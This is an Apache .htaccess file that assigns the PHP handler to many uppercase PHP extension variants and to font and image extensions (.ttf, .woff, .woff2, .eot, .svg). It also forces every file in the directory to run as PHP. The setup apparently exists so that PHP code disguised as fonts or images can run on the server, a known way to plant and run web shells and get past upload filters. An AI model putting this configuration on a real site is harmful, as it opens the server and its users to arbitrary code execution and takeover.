AddHandler application/x-httpd-php .php
AddType application/x-httpd-php .PHP
AddType application/x-httpd-php .PHP7
AddType application/x-httpd-php .PHTML
AddType application/x-httpd-php .PHT
AddType application/x-httpd-php .PHP5
AddType application/x-httpd-php .PHP8
AddType application/x-httpd-php .PHAR
AddHandler application/x-httpd-php .PHP
AddHandler application/x-httpd-php .PHP7
AddHandler application/x-httpd-php .PHTML
AddHandler application/x-httpd-php .PHT
AddHandler application/x-httpd-php .PHP5
AddHandler application/x-httpd-php .PHP8
AddHandler application/x-httpd-php .PHAR
<FilesMatch "\.PHP$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.PHP7$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.PHTML$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.PHT$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.PHP5$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.PHP8$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.PHAR$">
 SetHandler application/x-httpd-php
</FilesMatch>
AddType application/x-httpd-php .ttf
AddType application/x-httpd-php .woff
AddType application/x-httpd-php .woff2
AddType application/x-httpd-php .eot
AddType application/x-httpd-php .svg
AddHandler application/x-httpd-php .ttf
AddHandler application/x-httpd-php .woff
AddHandler application/x-httpd-php .woff2
AddHandler application/x-httpd-php .eot
AddHandler application/x-httpd-php .svg
<FilesMatch "\.ttf$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.woff$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.woff2$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.eot$">
 SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.svg$">
 SetHandler application/x-httpd-php
</FilesMatch>
Options +ExecCGI
ForceType application/x-httpd-php
php_flag engine 1
